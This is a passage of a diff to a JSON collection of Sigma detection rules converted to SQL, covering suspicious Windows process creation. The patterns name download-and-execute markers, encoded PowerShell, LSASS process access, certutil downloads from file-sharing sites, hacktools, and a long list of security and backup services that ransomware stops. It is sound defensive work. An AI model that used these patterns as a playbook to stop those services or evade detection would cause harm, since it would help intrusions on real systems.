'\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\csc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "description": 
"Detects the execution of AdvancedRun utility", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - 
"attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE 
'%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "falsepositives": [ + "GPO" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + ], + "filename": 
"proc_creation_win_reg_screensaver.yml" + }, + { + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. 
If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine 
LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE 
'%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' 
ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE 
'%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE 
'%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, 